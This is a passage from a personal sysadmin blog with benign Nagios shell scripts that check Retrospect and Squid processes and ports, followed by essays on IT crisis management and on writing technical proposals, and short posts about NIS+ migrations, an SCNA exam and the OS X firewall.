if [ `uname` != "SunOS" ]
then
        echo "WARNING:"
        echo "This script was originally written for use on Solaris."
        echo "You may run into some problems running it on this host."
        echo ""
        echo "Please verify that the script works before using it in a"
        echo "live environment. You can easily disable this message after"
        echo "testing the script."
        echo ""
fi

# You may have to change this, depending on where you installed your
# Nagios plugins
PATH="/usr/bin:/usr/sbin:/bin:/sbin"
LIBEXEC="/usr/local/nagios/libexec"
. $LIBEXEC/utils.sh

print_usage() {
	echo "Usage: $PROGNAME"
	echo "Usage: $PROGNAME --help"
}

print_help() {
	echo ""
	print_usage
	echo ""
	echo "Retrospect Backup Client monitor plugin for Nagios"
	echo ""
	echo "This plugin was not developed by the Nagios Plugin group."
	echo "Please do not e-mail them for support on this plugin, since"
	echo "they won't know what you're talking about :P"
	echo ""
	echo "For contact info, read the plugin itself..."
}

while test -n "$1" 
do
	case "$1" in
	  --help) print_help; exit $STATE_OK;;
	  -h) print_help; exit $STATE_OK;;
	  *) print_usage; exit $STATE_UNKNOWN;;
	esac
done

check_processes()
{
	PROCESS="0"
	if [ `ps -ef | grep retroclient | grep -v grep | grep -v nagios | wc -l` -lt 1 ]; then 
		echo "RETROSPECT NOK - One or more processes not running"
		exitstatus=$STATE_CRITICAL
		exit $exitstatus
	fi
}

check_processes

echo "RETROSPECT OK - Everything running like it should"
exitstatus=$STATE_OK
exit $exitstatus


kilala.nl tags: , , ,

View or add comments (curr. 0)

Nagios script: check_squid

2005-07-01 00:00:00

This script was written at the time I was hired by UPC / Liberty Global.

The text I wrote on Nagios Exchange about this script has been lost. I guess it speaks for itself :)



#!/usr/bin/bash
#
# Squid process monitor plugin for Nagios
# Written by Thomas Sluyter (nagiosATkilalaDOTnl)
# By request of DTV Labs, Liberty Global, the Netherlands
# Last Modified: 19-06-2006
# 
# Usage: ./check_squid
#
# Description:
# This plugin determines whether the Squid proxy server
# is running properly. It will check the following:
# * Are all required processes running?
# * Are all the required TCP/IP ports open?
#
# Limitations:
# Currently this plugin will only function correctly on Solaris systems.
#
# Output:
# The script returns a CRIT when the abovementioned criteria are
# not matched
#

# Host OS check and warning message
if [ `uname` != "SunOS" ]
then
        echo "WARNING:"
        echo "This script was originally written for use on Solaris."
        echo "You may run into some problems running it on this host."
        echo ""
        echo "Please verify that the script works before using it in a"
        echo "live environment. You can easily disable this message after"
        echo "testing the script."
        echo ""
fi

# You may have to change this, depending on where you installed your
# Nagios plugins
PATH="/usr/bin:/usr/sbin:/bin:/sbin"
LIBEXEC="/usr/local/nagios/libexec"
. $LIBEXEC/utils.sh

print_usage() {
	echo "Usage: $PROGNAME"
	echo "Usage: $PROGNAME --help"
}

print_help() {
	echo ""
	print_usage
	echo ""
	echo "Squid monitor plugin for Nagios"
	echo ""
	echo "This plugin was not developed by the Nagios Plugin group."
	echo "Please do not e-mail them for support on this plugin, since"
	echo "they won't know what you're talking about :P"
	echo ""
	echo "For contact info, read the plugin itself..."
}

while test -n "$1" 
do
	case "$1" in
	  --help) print_help; exit $STATE_OK;;
	  -h) print_help; exit $STATE_OK;;
	  *) print_usage; exit $STATE_UNKNOWN;;
	esac
done

check_processes()
{
	PROCESS="0"
	if [ `ps -ef | grep squid | grep -v grep | grep -v nagios | wc -l` -lt 2 ]; then 
		echo "SQUID NOK - One or more processes not running"
		exitstatus=$STATE_CRITICAL
		exit $exitstatus
	fi
}

check_ports()
{
	PORTS=0
	PORTLIST="8080 3128 3130"
	for NUM in `echo $PORTLIST`; do
	if [ `netstat -an | grep LISTEN | grep $NUM | grep -v grep | wc -l` -lt 1 ]; then PORTS=1;fi
	done

	if [ $PORTS -eq 1 ]; then 
		echo "SQUID NOK - One or more TCP/IP ports not listening."
		exitstatus=$STATE_CRITICAL
		exit $exitstatus
	fi
}

check_processes
check_ports

echo "SQUID OK - Everything running like it should"
exitstatus=$STATE_OK
exit $exitstatus


kilala.nl tags: , , ,

View or add comments (curr. 0)

When disaster strikes! Thomas and Roland discuss crisis management

2005-05-31 22:15:00

A PDF version of this document is available. Get it over here.

We've all experienced that sinking feeling: bleary-eyed and not halfway through your first cup of coffee, you're startled by the phone. Something's gone horribly wrong and your customers demand your immediate attention!

From then on things usually only get worse. Everybody's working on the same problem. Nobody keeps track of who's doing what. The problem has more depth to it than you ever imagined and your customers keep on calling back for updates. It doesn't matter whether the company is small or large: we've all been there at some point in time.

The last time we encountered such an incident at our company wasn't too long ago. It wasn't a pretty sight and actually went pretty much as described above. During the final analysis our manager requested that we produce a small checklist which would prevent us from making the same mistakes again. The small checklist finally grew into this article which we thought might be useful for other system administrators as well.

Before we begin we'd like to mention that this article was written with our current employer in mind: large support departments, multiple tiers of management, a few hundred servers and an organization styled after ITIL. Most of the principles that are described in this document also apply to smaller departments and companies albeit in a more streamlined form. Meetings will not be as formal, troubleshooting will be more supple and communication lines between you and the customer will be shorter.

Now, we have been told that ITIL is a mostly European phenomenon and that it is still relatively unknown in the US and Asia. The web site of the British Office of Government Commerce (http://www.itil.co.uk) describes ITIL as follows:

"ITIL (IT Infrastructure Library) is the most widely accepted approach to IT Service Management in the world. ITIL provides a cohesive set of best practice, drawn from the public and private sectors internationally.



ITIL is ... supported by publications, qualifications and an international user group. ITIL is intended to assist organizations to develop a framework for IT Service Management."

Some readers may find our recommendations to be strict, while others may find them completely over the top. It is of course up to your own discretion how you deal with crises.

Now. Enough with the disclaimers. On with the show!

A method to the madness

The following paragraphs outline the phases which one should go through when managing a crisis. The way we see things, phases 1 through 3 and phase 11 are all parts of the normal day to day operations. All steps in between (4 through 10) are steps to be taken by the specially formed crisis team.

1. A fault is detected

2. First analysis

3. First crisis meeting

4. Deciding on a course of action

5. Assigning tasks

6. Troubleshooting

7. Second crisis meeting

8. Fixing the problems

9. Verification of functionality

10. Final analysis

11. Aftercare

1. A fault is detected

"Oh the humanity!..."

Reporter at the crash of the Hindenburg

It really doesn't matter how this happens, but this is naturally the beginning. Either you notice something while V-grepping through a log file, or a customer calls you, or some alarm bell starts going off in your monitoring software. The end result will be the same: something has gone wrong and people complain about it.

In most cases the occurrence will simply continue through the normal incident process since the situation is not of a grand scale. But once every so often something very important breaks and that's when this procedure kicks in.

2. First analysis

"Elementary, dear Watson."

The famous (yet imaginary) detective Sherlock Holmes

To be sure of the scale of the situation you'll have to make a quick inventory:

Once you have collected all of this information you will be able to provide your management with a clear picture of the current situation. It will also form the basis for the crisis meeting, which we will discuss next.

This phase underlines the absolute need for detailed and exhaustive documentation of your systems and applications! Things will go so much smoother if you have all of the required details available. If you already have things like Disaster Recovery Plans lying around, gather them now.

If you don't have any centralized documentation yet we'd recommend that you start right now. Start building a CMDB, lists of contacts and so-called build documents describing each server.

3. First crisis meeting

"Emergency family meeting!"

From "Cheaper by the dozen"

Now the time has come to determine how to tackle the problem at hand. In order to do this in an orderly fashion you will need to have a small crisis meeting.

Make sure that you have a whiteboard handy, so you can make a list of all of the detected defects. Later on this will make it easier to keep track of progress with the added benefit that the rest of your department won't have to disturb you for updates.

Gather the following people:

During this meeting the on-call team member brings everybody up to speed. The supervisor is present so that he/she may be prepared for any escalation from above, while the problem manager needs to be able to inform the rest of your company through the ITIL problem process. Of course it is clear why all of the other people are invited.

4. Deciding on a course of action

One of the goals of the first crisis meeting is to determine a course of action. You will need to set out a clear list of things that will be checked and of actions that need to be taken, to prevent confusion along the way.

It is possible that your department already has documents like a Disaster Recovery Plan or notes from a previous comparable crisis that describe how to treat your current situation. If you do, follow them to the letter. If you do not have documents such as these you will need to continue with the rest of our procedure.

5. Assigning tasks

Once a clear list of actions and checks has been created you will have to assign tasks to a number of people. We have determined a number of standard roles:

It is imperative that the spokesperson is not involved with any troubleshooting whatsoever. Should the need arise for the spokesperson to get involved, then somebody else should assume the role of spokesperson in his place. This will ensure that lines of communication don't get muddled and that the real work can go on like it should.

6. Troubleshooting

In this phase the designated troubleshooters go over the list of possible checks that was determined in the first crisis meeting. The results for each check need to be recorded of course.

It might be that they find some obvious mistakes that may have led to the situation at hand. We suggest that you refrain from fixing any of these, unless they are really minor. The point is that it would be wiser to save these errors for the meeting that is discussed next.

This might seem counterintuitive, but it could be that these errors aren't related to the fault or that fixing them might lead to other problems. This is why it's wiser to discuss these findings first.

7. Second crisis meeting

Once the troubleshooters have gathered all of their data the crisis team can enter a second meeting.

At this point in time it is not necessary to have either the supervisor or the problem manager present. The spokesperson and the troubleshooters (perhaps assisted by a specialist who's not on the crisis team) will decide on the new course of action.

Hopefully you have found a number of bugs that are related to the fault. If you haven't, loop back to step 4 to decide on new things to check. If you did, now is the time to decide how to go about fixing things and in which order to tackle them.

Make a list of fixable errors and glance over possible corrections. Don't go into too much detail, since that will take up too much time. Leave the details to the person who's going to fix that particular item. Assign each item on the list to one of the troubleshooters, and decide in which order they should be fixed.

When you're done with that, start thinking about plan B. Yes, it's true that you have already invested a lot of time into troubleshooting your problems, but it might be that you will not be able to fix the problems in time. So decide on a time limit if it hasn't been determined for you and start thinking worst case scenario: "What if we don't make it? How are we going to make sure people can do their work anyway?".

8. Fixing the problems

Obviously you'll now tackle each error, one by one. Make sure that you take notes of all of the changes that are made. Once more though (I'm starting to feel like the school teacher from The Wall): don't be tempted to do anything you shouldn't be doing.

Don't go fixing other faults you've detected. And absolutely do not use the downtime as a convenient time window to perform an upgrade you'd been planning on doing for a while.

9. Verification of functionality

Once you've gone over the list of errors and have fixed everything, verify that peace has been brought to the land, so to speak. Also verify that your customers can work again and that they experience no more inconvenience. Strike every fixed item from the whiteboard, so your colleagues are in the know.

If you find that there are still some problems left, or that your fixes broke something else, add them to the board and loop back to phase 3.

10. Final analysis

"Analysis not possible... We are lost in the universe of Olympus."

Shirka the board computer, from "Ulysses31"

Naturally your customers will want some explanation for all of the problems you caused them (so to speak). So gather all people involved with the crisis team and hold one final meeting. Go over all of the things you've discovered and make a neat list. Cover how each error was created and its repercussions. You may also want to explain how you'll prevent these errors from happening again in the future.

What you do with this list depends entirely on the demands set out by your organization. It could be that all your customers want is a simple e-mail, while ITIL-reliant organizations may require a full blown Post Mortem.

11. Aftercare

"I don't think any problem is solved unless at the end of the day you've turned it into a non-issue. I would say you're not doing your job properly if it's possible to have the same crisis twice."

Salvaico, Sysadmintalk.com forum member

Apart from the Post Mortem which was already mentioned you need to take care of some other things.

Maybe you've discovered that the server in question is underpowered or that the faults experienced were fixed in a newer version of the software involved. Things like these warrant the start of a new project at the cost of your customers. Or maybe you've found that your monitoring is lacking when it comes to the resource(s) that failed. This of course will lead to an internal project for your department.

All in all, aftercare covers all of the activities required to make sure that such a crisis never occurs again. And if you cannot prevent such a crisis from happening again you should document it painstakingly so that it may be solved quickly in the future.

Final thoughts

We sincerely hope that our article has provided you with some valuable tips and ideas. Managing crises is hard and confusing work and it's always a good idea to take a structured approach. Keeping a clear and level head will be the biggest help you can find!


kilala.nl tags: , , ,

View or add comments (curr. 0)

Rebuilding your company's network

2005-03-14 06:51:00

Currently listening to "Ode to my family" by the Cranberries.

Wooh boy, what a weekend! I never knew that changing one simple IP address on a server could have such pronounced effects.

Due to our IP ranges at work being too limited, the Networks department has been working hard to get new switches installed. They're moving all of our servers from VLANs with a netmask of 255.255.255.192 to ones with a netmask of 255.255.255.0. As you can imagine this broadens the range of one VLAN significantly. That all sounds good, right? Well, naturally we need to be present to change the IP settings for all of our servers. Not too much work either, were it not for the fact that two of the servers being moved are replica servers for BoKS and NIS+.
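
For those who like to see that spelled out, a quick bit of back-of-the-envelope shell arithmetic:

# Usable host addresses per VLAN, before (/26) and after (/24) the move:
echo "255.255.255.192 (/26): $(( 2**(32-26) - 2 )) hosts"   # 62
echo "255.255.255.0   (/24): $(( 2**(32-24) - 2 )) hosts"   # 254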

Now normally these transitions aren't that difficult to perform, were it not for the fact that NIS+ had decided to act like an utter bitch for the weekend! After moving the server to its new switch we needed to rebuild it as a replica in order to propagate the new IP to all of its clients through the master. Usually this takes about half an hour, including the table copies. This time around though she was determined to cooperate as little as possible! Copying one table took about an hour from entering the command to finishing the copy!

All in all it cost me the better part of seven hours to get everything in place! Grrargh. But, in my defense, that includes reconfiguring all BoKS client systems and waiting until Networks had laid out the required patches :[


kilala.nl tags: ,

View or add comments (curr. 0)

Migrating to a new NIS+ master

2005-02-21 08:30:00

Currently listening to "Press Conference rag" from the musical Chicago.

What a relief! We finally managed to move NIS+ to a new Master server. We put in about twelve hours on Saturday, but we finally got that bitch tamed! :) Proper credit needs to be awarded, so I would like to say that our success was mostly due to the scripts which had been crafted by Jeroen and Roland.


kilala.nl tags: , ,

View or add comments (curr. 0)

Switching NIS+ to a new master server

2005-01-16 15:38:00

Bad news for those sysadmins out there waiting for news regarding the NIS+ migration. We tried our best yesterday, but moving NIS+ to a new Master server failed again :( This time around we used a tried and true (although much improved upon by Jeroen) procedure, which is usually reserved for worst case scenarios. Unfortunately we ran into some unforeseen problems. I'll tell you more about them when I deliver the _real_ procedure.


kilala.nl tags: , ,

View or add comments (curr. 0)

Zen and the art of getting what you want

2004-12-03 18:43:00

A PDF version of this document is available. Get it over here.

Throughout the last two years I have written a number of technical proposals for my employer. These usually concerned either the acquisition of new hardware or modifications to our current infrastructure.

Strangely enough my colleagues didn't always have the same success as I did, which got me to thinking about the question "How does one write a proper proposal anyway?".

In this mini-tutorial I'll provide a rough outline of what a proposal should contain, along with a number of examples. Throughout the document you'll also find a number of Do's and Don'ts to point out common mistakes.

You will also notice that I predominantly focus on the acquisition of hardware in my examples. This is due to the nature of my line of work, but let me say that the stuff I'll be explaining applies to many other topics. You may just as well apply them to desired changes to your network, some software that you would like to use and even to some half-assed move which you want to prevent management from making.

Now I've never been a great fan of war, but Sun Tzu really knew his stuff! Even today his philosophies on war and battle tactics are still valid and are regularly applied. And not just in the military, since these days it's not uncommon to see corporate busy-bodies reading "The art of war" while commuting to work. In between my stuff you'll find quotes from Sun Tzu which I thought were applicable to the subject matter.

Zen and the art of 'getting what you want'

"Though we have heard of stupid haste in war, cleverness has never been seen associated with long delays."

Sun Tzu ~ "The art of war"

It happens occasionally that I overhear my colleagues talking about one of their proposals. Sometimes the discussion is about the question of why their idea got shot down and "what the heck was wrong with the proposal?". They had copied a proposal that had worked in the past and replaced some information with their own. When I ask to see said proposal, I'm presented with two sheets of paper, of which one is the quote from our vendor's sales department. The other consists of 30% header/footer, a short blurb on what we want to buy and a big box repeating all of the pricing info.

The problem with such a document of course is that management gets its nose rubbed in the fact that we want to spend their money (and loads of it too). To them such a proposal consists of a lot of indecipherable technical mumbo-jumbo (being the quote and some technical stuff), with the rest of the document taking up dollars-Dollars-DOLLARS. While to you it may seem that the four or five lines of explanation provide enough reason to buy the new hardware, to management this will simply not do.

So? One of the things it takes to write a proper proposal is to write one which keeps your organization's upper echelons in mind. However! Don't forget about your colleagues either. It is more than logical that you run a proposition past your peers to check whether they agree with all of the technicalities.

So in order to make sure that both your targets agree on your proposal you will have to:

A) employ tech-speak to reach your peers and

B) explain your reasoning in detail to your management.

In order to craft such a document there are a number of standard pieces to the puzzle which you can put in place. I'll go over them one by one. One thing I want you to realize though, is the fact that this will take time. Expect to spend at least half a day or even more on writing.

Pieces to the puzzle

My proposals tend to consist of a number of sections, some of which are optional as not every type of proposal requires the information contained therein. For instance, not every project will require resources which can be easily expressed in numbers and hence there is no need for a list of costs.

  1. A summary: describes in short your current problem, your solution for this and the estimated costs.
  2. Introducing the scope: gives your audience a clear picture of the troubled environment involved.
  3. Problems and solutions: describes in detail what is wrong, what the repercussions are (and what they may become) and your proposed solution.
  4. What is required? A list of things that you'll need to fix the problem.
  5. Other options: of course management wants the ability to save money. Here's where you give them the option to.
  6. Making it work: describes which departments need to put in resources and what their tasks will be.
  7. A break-down: the costs of the various options, set off against their merits and flaws.
  8. Final words: a last plea to your audience.

1. A summary

"The art of war teaches us to rely not on the likelihood of the enemy's not coming, but on our own readiness to receive him."

Sun Tzu ~ "The art of war"

Keep this part as short and simple as possible. Use one, maybe two short paragraphs to describe the current situation or problem and describe how you'll fix it. Use very general terms and make sure that it is clear which of the reader's needs you are addressing.

Be very careful not to put too much stuff in this section. Its main purpose is to provide the reader with a quick overview of what the problem is that you're trying to solve and what your final goal is. Not only will this allow the reader to quickly grasp the subject of your proposal, but it will also make sure that it will be more easily found on a cluttered desk. A short summary means quick recognition.

For example:

In the past year UNIX Support have put a big effort into improving the stability and performance capacity of their BoKS and NIS+ infrastructural systems. However, the oldest parts of our infrastructure have always fallen outside the scope of these projects and have thus started showing signs of instability. This in turn may lead to bigger problems, ending in the complete inaccessibility of our UNIX environment.



I propose that we upgrade these aging servers, thus preventing any possible stability issues. The current estimated cost of the project is $16,260.

2. Introducing the scope

Most managers only have a broad view of what is going on in the levels beneath them when it comes down to the technical nitty-gritty. That's the main reason why you should include a short introduction on the scope of your proposal.

Give a summary of the services that the infrastructure delivers to the "business". This helps management to form a sense of importance. If a certain service is crucial to your company's day to day operation, make sure that your reader knows this. If it will help paint a clearer picture you can include a simple graphic on the infrastructure involved.

The whole point of this section is to impress upon management that you are trying to address their needs, not yours. It's one thing to supply you with resources to tickle one of your fancies, but it's a wholly different thing to pour money into something that they themselves need.

For example:

BoKS provides our whole UNIX environment with mechanisms for user authentication and authorization. NIS+ provides all of the Sun Solaris systems from that same environment with directory services, containing information on user accounts, printers, home directories and automated file transfer interfaces.



Without either of these services it will be impossible for us to maintain proper user management. Also, users will be unable to log in to their servers should either of these services fail. This applies to all departments making use of UNIX servers, from Application and Infrastructure Support, all the way through to the Dealing Room floor.

3. Problems and proposed solutions

"Whoever is first in the field and awaits the coming of the enemy, will be fresh for the fight; whoever is second in the field and has to hasten to battle will arrive exhausted." Sun Tzu ~ "The art of war"

Meaning: when writing your proposal, try to keep every possible angle on your ideas in mind. Try to anticipate any questions your reader might have and present your ideas in such a way that they will appeal to your audience. If you simply describe your goal instead of providing proper motivation, you'll be the one who "is second in the field".

In the previous section of your document you provided your audience with a quick description of the environment involved. Now you'll have to describe what's wrong with the current situation and what kind of effects it may have in the future. If your proposal covers the acquisition or upgrade of multiple objects, cover them separately. For each object define its purpose in the scope you outlined in the previous section. Describe why you will need to change their current state and provide a lengthy description of what will happen if you do not.

However, don't be tempted to exaggerate or to fudge details so things seem worse. First off a proposal which is overly negative may be received badly by your audience. And secondly, you will have to be able to prove all of the points you make. Not only will you look like an ass if you can't, but you may also be putting your job on the line! So try to find the middle road. Zen is all about balance, and so the 'art of getting what you want' should also be.

For example:

Recently the master server has been under increased load, causing both deterioration of performance and stability. This in turn may lead to problems with BoKS and with NIS+, which most probably will lead to symptoms like:

* Users will need more time to log into their UNIX accounts.

* Users may become unable to log into their UNIX accounts.

* User accounts and passwords may lose synchronicity.

Close off each sub-section (one per object) with a clearly marked recommendation and a small table outlining the differences between the current and the desired situation. Keep your recommendation and the table rather generic. Do not specify any particular makes or models of hardware yet.

Of course the example below is focused on the upgrading of a specific server, but you can use such a table to outline your recommendations regarding just about anything. Versions of software for example, or specifics regarding your network architecture. It will work for all kinds of proposals.

For example:

UNIX Support recommends upgrading the master server's hardware to match or exceed current demands on performance



                 Current                        Recommended

System type:     Sun Netra T1 200               -

Processor:       Ultrasparc IIe, 500 MHz        2x Ultrasparc IIIi, 1 GHz

Memory:          512 MB                         1 or 2 GB

Hard drives:     2x 18 GB + 2x 18 GB ext.       2x 36 GB, internal mirror

The whole point of this section of your proposal is to convince your readers that they're the captain of the Titanic and that you're the guy who can spot the iceberg in time. All is not lost... Yet...

4. What is required to make this work?

"The general who wins a battle makes many calculations in his temple ere the battle is fought. The general who loses a battle makes but few calculations beforehand."

Sun Tzu ~ "The art of war"

Now that you have painted your scenario and provided a vision of how to go about solving things, you will need to give an overview of what you will be needing.

Don't just cover the hardware you'll need to acquire, but also take your time to point out which software you'll need and more importantly: which departments will need to provide resources to implement your proposal. Of course, when it comes to guesstimates regarding time frames, you are allowed to add some slack. But try to keep your balance and provide your audience with an honest estimate.

One thing though: don't mention any figures on costs yet. You'll get to those later on in the proposal.

For example:

A suitable solution for both Replica servers would be the Sun Fire V210. These systems will come with two Ultrasparc II processors and 2 GB of RAM installed. This configuration provides more than enough processing power, but is actually cheaper than a lower-specced V210.

5. Other viable options

"Do not interfere with an army that is returning home. When you surround an army, leave an outlet free. Do not press a desperate foe too hard."

Sun Tzu ~ "The art of war"

The above quote seems to be embodied in one of Dilbert's philosophies these days: "Always give management a choice between multiple options, even if there is only one".

Of course, in Dilbert's world management will always choose the least desirable option, for instance choosing to call a new product the 'Chlamydia', because "it sounds Roman". It will be your task to make the option you want to implement the most desirable one in the eyes of your readers.

In case your proposal involves spending money, this is where you tell management: "Alright, I know times are lean, so here's a number of other options. They're less suitable, but they'll get the job done". Any which way, be sure that even these alternatives will do the job you'd want them to. Never give management the possibility to choose an option that will not be usable in real life.

For example:

Technically speaking it is possible to cut costs back a little by ordering two new servers, instead of four, while re-using two older ones. This alternate scenario would cut the total costs back to about $8,360 (excluding VAT).

If the main subject of your proposal is already the cheapest viable option, say so. Explain at length that you have painstakingly pinched every penny to come up with this proposal. Also mention that there are other options, but that they will cost more money/resources/whatever. Feel free to give some ballpark figures.

For example:

Unfortunately there are no cheaper alternatives for the Replica systems. The Sun Fire V120 might have been an option, were it not for the following facts:

* It is not in the support matrix as defined by UNIX Support.

* It is not natively capable of running IP Multi Pathing.

* It will reach its so-called End Of Life state this year.

Basically you need to make management feel good about their decision to give you what you want. You really don't want them to pick any other solution than the one you're proposing, but you are also obliged to tell them about any other viable possibilities.

6. Making it work

In the case of some projects you are going to need the help of other people. It doesn't matter whether they are colleagues, people from other departments or external parties. In this section you will list the resources you are going to need from them.

You don't have to go into heavy detail, so give a broad description of the tasks laid out for these other parties. Estimate in man-hours how much time it will take to perform them and also how many people you will need from each source. Not only will this give management a clear picture of all of your needs, but a list like this will also give your readers a sense of the scale of the whole project.

For example:

In order to implement the proposed changes to our overall security we will require the cooperation of a number of our peer departments: Information Risk Management (IRM) will need to provide AS and our customers with clear guidelines, describing the access protocols which will be allowed in the future. It is estimated that one person will require about 36 hours to handle all of the paper work.



Security Operations (GSO) will need to slightly modify their procedures and some of the elements of their administrative tools, to accommodate the stricter security guidelines. It is estimated that one person will need about 25 hours to make the required alterations.

7. Breaking things down

You'll need to try and keep this section as short as possible, since it covers the costs of all of the viable options that you provided in the previous sections. Create a small table, setting off each option against the costs involved. Add a number of columns with simple flags which you can use to steer the reader towards the option of your choice.

Reading back I realize that I'll need to clarify that a bit :) Try and recall some of those consumer magazines or sites on the web. Whenever they make a comparison between products they often include a number of columns marked with symbols like + (satisfactory), ++ (exceeds expectations), - (not too good) or -- (horrific). What you'll be doing is thinking of a number of qualities of your options which you can set off against each other.

It goes without saying that you should be honest when assigning these values. If another option starts to look more desirable by now you really have to re-evaluate your proposal.

For example:

A table detailing your various options.
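Purely as an illustration (the figures and scores below are made up for this tutorial, they do not come from a real proposal), such a table could look something like this:

Option                                  Costs     Performance  Maintenance  Lifespan
1. Four new Sun Fire V210 servers       $16,260   ++           ++           ++
2. Two new servers, re-using two old    $8,360    +            -            -
3. Keep the current hardware            $0        --           --           --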

8. Final words

"The clever combatant imposes his will on the enemy, but does not allow the enemy's will to be imposed on him."

Sun Tzu ~ "The art of war"

Use two, maybe three, paragraphs to make one final impression on the reader. Briefly summarize the change(s) that you're proposing and repeat your arguments. Be firm, yet understanding in your writing.

For example:

We have provided you with a number of possible scenarios for replacement, some options more desirable than others. In the end however we are adamant that replacement of these systems is necessary and that postponing these actions may lead to serious problems within our UNIX environment, and thus in our line of business.

Regarding tone and use of language

At all times keep in mind who your target audience is. It is quite easy to fall back into your daily speech patterns when writing an extensive document, even though at some point that may actually lead to catastrophe.

Assume that it is alright to use daily speech patterns in a document which will not pass farther than one tier above your level (meaning your supervisor and your colleagues). However, once you start moving beyond that level you will really need to tone down.

Some points of advice:

Regarding versioning and revisioning

At my current employer we have made a habit of including a small table at the beginning of each document which outlines all of the versions this document has gone through. It shows when each version was written and by whom. It also gives a one-liner regarding the modifications and finally each version has a separate line showing who reviewed the document.

Of course it may be wise to use different tables at times. One table for versions that you pass between yourself and your colleagues and one for the copies that you hand out to management. Be sure to include a line for the review performed by your supervisor in both tables. It's an important step in the life cycle of your proposal.
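To give you an idea (the names and dates here are completely fictional), such a version table could look like this:

Version  Date        Author      Changes                         Reviewed by
0.1      01-10-2004  A. Author   First draft                     -
0.2      04-10-2004  A. Author   Processed comments from peers   B. Colleague
1.0      08-10-2004  A. Author   Final version for management    C. Supervisor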

This may be taking things a bit far for you, but it's something we've grown accustomed to.

Final thoughts

"Begin by seizing something which your opponent holds dear; then he will be amenable to your will." Sun Tzu ~ "The art of war"

Or in other words: management is almost sure to give in, if you simply make sure they know things will go horribly wrong with their environment if you are not allowed to do what you just proposed.

Of course no method is the be-all-and-end-all way of writing proposals, so naturally neither is mine. Some may simply find it too elaborate, while in other cases management may not be very susceptible to this approach. Try and find your own middle road between effort and yield. Just be sure to take your time and to be prepared for any questions you may get about your proposal.


kilala.nl tags: , , ,

View or add comments (curr. 1)

Hacking NIS+ and BoKS

2004-11-17 18:25:00

Holy moly, what a weekend! I can tell you guys right now that the procedure I wrote for switching NIS+ master servers is NOT foolproof! We had planned to take about four hours at most for switching both NIS+ and BoKS over to a new master server. Unfortunately it turned out that we only got to spend one hour on switching NIS+ before things went horribly sour.

In the end I spent a total of eighteen hours in the office on Saturday and Sunday. I'll spare you the gory details for now (I'll incorporate them in version 2.0 of the master switch procedure).

But God, what a weekend! And the way it looks now we'll be repeating it in a week or so...

Aniwho... I'm still trying to put as much time as possible into my work for the convention, but it's going slowly. I plan on spending every free minute of coming Thursday on my Foundation work though. That should get me along the way nicely.


kilala.nl tags: , , ,

View or add comments (curr. 0)

Moving NIS+ to a new master server

2004-11-15 20:14:00

Finally got round to writing the "Switch to a new master" procedure for NIS+. This procedure is damn handy when you want to move your current NIS+ root master to new hardware. This is something that we'll be doing at my employer on the 20th of November, so I'll keep you guys posted. I'll also be sure to update the procedure should anything go wrong :]


kilala.nl tags: , ,

View or add comments (curr. 0)

Additions to the Sysadmin section

2004-11-15 19:17:00

More expansion in the UNIX Sysadmin section! I've added procedures for initialising new NIS+ clients and for switching NIS+ over to a new master server.


kilala.nl tags: ,

View or add comments (curr. 0)

Writing more articles

2004-11-11 21:55:00

The way things are looking right now I'll be writing a whole series of articles for the discerning system admin :) As you know I finished an article on the crafting of proposals a week or so ago. Now I'm also planning to do articles on "keeping personal and project planning" and on "catastrophe management".

I'll also be using my lovely Powermac G5 for something completely new today! At the office we lost two passwords for NIS+ credentials and luckily we managed to retrieve what we _think_ are the encrypted password strings. So now I'll try and use John the Ripper to crack the passwords. I've no clue how long this'll take and I hope I can get things finished before the 20th. 'Cause that's when I need the damn passwords :)


kilala.nl tags: , ,

View or add comments (curr. 0)

Reviewing NIS+ books

2004-11-11 19:51:00

I've added a little review page for books on the topic of NIS+, since that's something I'm currently very into at the office.


kilala.nl tags: , , , ,

View or add comments (curr. 0)

How to write proposals

2004-11-01 09:33:00

Version 2.0 of my tutorial on writing proposals is available from the menu now. Share and enjoy!


kilala.nl tags: , , ,

View or add comments (curr. 0)

Writing technical proposals

2004-10-23 09:05:00

Finally my work on the HOWTO for writing technical proposals is done! I've added the PDF file to the menu bar on the left. Unfortunately, for some reason PDF printing from OpenOffice doesn't always seem to work properly. The file in the menu bar prints perfectly when dragged onto my desktop printer (albeit in black and white, and not in color), but both Preview and Acrobat Reader refuse to open the file.

If any of you guys happen to have any problems opening the file, please let me know. I'll see what I can do to get things fixed.


kilala.nl tags: , , ,

View or add comments (curr. 0)

SCNA erratum

2004-09-22 20:01:00

In the menu of the Sysadmin section you will also find a link to a small erratum which I wrote after reading Rick Bushnell's book. As you can see I found quite a number of errors. I also e-mailed this list to Prentice Hall publishers and hope that they will make proper use of the list.


kilala.nl tags: , , , ,

View or add comments (curr. 0)

Passed my SCNA exam

2004-09-22 13:26:00

Booyeah! While I can't say that I aced the SCNA exam, I'm still extremely happy with my score: an 89% (52 out of 58 scored questions).


kilala.nl tags: , , ,

View or add comments (curr. 0)

SCNA summary done!

2004-09-15 22:13:00

Well, it took me a couple of days, but finally it's done: my summary of the "SCNA study guide" by Rick Bushnell (see the book list). I'll be taking my first shot at the SCNA exam in about a week (the 22nd, keeping my fingers crossed), so I'm happy that I've finished the document. I thought I'd share it with the rest of you; maybe it'll be of some use.

All 29 pages are available for download as a PDF from the Sysadmin section.


kilala.nl tags: , , , , ,

View or add comments (curr. 0)

Burn baby burn! Configuring the OS X firewall.

2004-04-03 00:00:00

It's only been a couple of months since I switched to Apple OS X, but since then I've learnt many a thing about the OS. It was only recently though that I found the need to configure the built in firewall. This little HOWTO'll explain all of the steps I took.

The built in firewall software is one of the many OS X features that Apple likes to tout, claiming a higher level of security out of the box when compared to other OSes. And yes indeed the firewall software does appear to do its job properly. With one exception...

Conventions used within this document

Before we begin I would like to point out a couple of conventions I will be using in this document. Whenever you encounter any text written in courier new bold, this means that you're either reading commands which need to be entered into the UNIX command line of OS X or a list of packages or menu names. You will also encounter lines starting with the text "kilala:~ thomas$". This is merely the command prompt as displayed on my system and I include it in these texts to indicate the commands to be entered.

Firewalls? What the heck?...

First off, I can imagine that some of the people reading this have no idea what a firewall is or does. They might've heard the word before on the web or in Apple's (or Microsoft's) PR spiel. I won't go into any technical details, but I'll give a short explanation of the ideas behind a firewall. If you would like more detailed information I recommend a website like http://computer.howstuffworks.com/firewall.htm.

Firewalls are a sort of security measure which works by separating your computer or network from a possibly hostile network, like the Internet. This separation usually takes place by disallowing any and all network traffic to and from your systems, while only allowing a certain number of protocols in and/or out. For instance, a home user may set up his firewall to block everything except outgoing e-mail and browser traffic. On the other hand some companies could be allowing incoming browser requests to their own webserver, in addition to the already mentioned outgoing e-mail and browser traffic.

